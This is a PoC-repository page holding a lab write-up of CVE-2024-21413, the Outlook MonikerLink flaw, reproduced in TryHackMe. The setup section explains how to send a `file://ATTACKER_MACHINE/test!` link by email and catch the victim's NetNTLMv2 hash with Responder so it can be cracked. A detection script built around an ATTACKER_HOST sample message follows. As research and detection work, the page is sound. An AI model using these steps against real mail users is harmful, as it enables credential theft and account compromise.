
PoC details: 0d4cd4d1b8d58b9e77bb4d95992a4f613a14e171

Source
Related vulnerability
Title: Microsoft Outlook security vulnerability (CVE-2024-21413)
Description: Microsoft Outlook is an e-mail application from the US company Microsoft. Microsoft Outlook contains a security vulnerability. The following products and versions are affected: Microsoft Office 2019 for 32-bit editions, Microsoft Office 2019 for 64-bit editions, Microsoft 365 Apps for Enterprise for 32-bit Systems, Microsoft 365 Apps for Enterprise
Description
This repository contains research notes and a high-level proof-of-concept (PoC) for CVE-2024-21413, a vulnerability observed in certain mail clients when handling SMB/moniker-style links embedded in messages. The PoC and experiments documented here were performed in a controlled lab environment on systems.
Introduction
# 💻 CVE-2024-21413-Microsoft-Outlook-Remote-Code-Execution-Vulnerability-PoC

## 🧩 Overview

> This project reproduces the MonikerLink behavior (CVE-2024-21413) in a fully isolated TryHackMe environment to show how certain hyperlink formats can cause Outlook to process a link in a way that leaks authentication attempts or leads to further exploitation. The deliverable is a PoC, and a prioritized set of mitigations and detection suggestions that security teams can apply. No live / unauthorized systems were targeted.
---

## ⚙️ Tools & Technologies
| Tool / Skill | Purpose |
|---------------|----------|
| 🐍 Python | Script development |
| 💻 Linux (Kali) | Target system |
| 🔐 Metasploit | Exploitation & access |
| 🧱 TryHackMe Lab | Controlled environment |

---

## 🚀 Setup & Execution

- Open a terminal on the Linux attacking machine
    - Created a Python file and pasted in the code [exploit.py](exploit.py)
      > This code is written by CMNatic and can be found [here](https://github.com/CMNatic/CVE-2024-21413)
    - I modified the code to fit my machine's environment.
        > For example, in the line `<a href="file://ATTACKER_MACHINE/test!"` I replaced "ATTACKER_MACHINE" with the IP address of my attacking machine, and in the line `server = smtplib.SMTP('MAILSERVER', 25)` I changed "MAILSERVER" to the IP address of my victim machine.
    - Then I ran the exploit.py file and got the reply saying "the email has been sent"
    - To catch the NetNTLMv2 response (a hash that can be cracked with John the Ripper or other tools to recover the plaintext password), I used a tool called Responder to capture the response from the victim machine. The command to run Responder was
      > responder -I ens5
      - Here -I stands for the interface, and I used the ens5 interface. In my case the command showed an error, so to resolve it I first ran the following command, then retried the above command and it worked
        > systemctl start systemd-resolved
- Then I logged into my victim machine
  - I opened Outlook and clicked the link within the mail I had sent from the attacking machine
- This way, upon one click on the link, Responder on my attacking machine was able to catch the NetNTLMv2 hash
![netNTLMv2 hash](responder.png)
---

This proof-of-concept exposes a nuance in Microsoft Outlook's link handling: certain file://-style moniker links that reference SMB resources may evade Outlook's standard filtering and provoke outbound authentication attempts. The behavior demonstrated here was reproduced in a fully controlled TryHackMe lab and highlights how seemingly benign link formats can mask network interactions. Although vendor patches and detection guidance have been issued, the underlying mechanics remain complex due to legitimate uses of the moniker/file scheme. Importantly, the activity generated by this PoC is observable at the network level (for example, in packet captures showing NTLM authentication attempts), making it amenable to forensic analysis and incident investigation.

## Detection
A YARA rule written by Florian Roth detects emails containing the `file:\\` element.
![Wireshark image](wireshark.png)
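As an added example (not code from this repository or from the YARA rule mentioned above), the following Python script applies the same detection idea on the mail side: it parses a message, collects every `href` in its HTML parts, and flags links that use the `file:` or UNC scheme, marking those that also carry the `!` moniker separator the PoC relies on. The sample message and the `ATTACKER_HOST` name are constructed placeholders.

```python
import email
from email import policy
from html.parser import HTMLParser

# Constructed sample message (not from the PoC): an HTML body carrying a
# file:// link with the "!" moniker suffix. ATTACKER_HOST is a placeholder.
SAMPLE_EML = """\
From: sender@example.test
Subject: constructed test message
MIME-Version: 1.0
Content-Type: text/html; charset="utf-8"

<html><body><a href="file://ATTACKER_HOST/test!">open the shared file</a>
<a href="https://example.test/ok">normal link</a></body></html>
"""

def classify_href(href):
    """None for ordinary links; "file-link" for file:/UNC targets; "moniker"
    when the target also carries the "!" moniker separator."""
    h = href.strip()
    if not (h.lower().startswith("file:") or h.startswith("\\\\")):
        return None
    return "moniker" if "!" in h else "file-link"

class _HrefCollector(HTMLParser):
    """Collect href attributes of <a> tags from an HTML part."""
    def __init__(self):
        super().__init__()
        self.hrefs = []

    def handle_starttag(self, tag, attrs):
        if tag == "a":
            for name, value in attrs:
                if name == "href" and value:
                    self.hrefs.append(value)

def suspicious_links(raw_eml):
    """Return (href, verdict) pairs for file:/UNC links in the HTML parts."""
    msg = email.message_from_string(raw_eml, policy=policy.default)
    hits = []
    for part in msg.walk():
        if part.get_content_type() != "text/html":
            continue
        collector = _HrefCollector()
        collector.feed(part.get_content())
        for href in collector.hrefs:
            verdict = classify_href(href)
            if verdict is not None:
                hits.append((href, verdict))
    return hits
```

Feeding a real mailbox export (.eml files) through `suspicious_links` gives a quick triage list; a "moniker" verdict is the case the Wireshark capture above corresponds to.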
File snapshot

```
[4.0K] /data/pocs/0d4cd4d1b8d58b9e77bb4d95992a4f613a14e171
├── [1.2K] exploit.py
├── [3.2K] README.md
├── [177K] responder.png
└── [ 62K] wireshark.png

1 directory, 4 files
```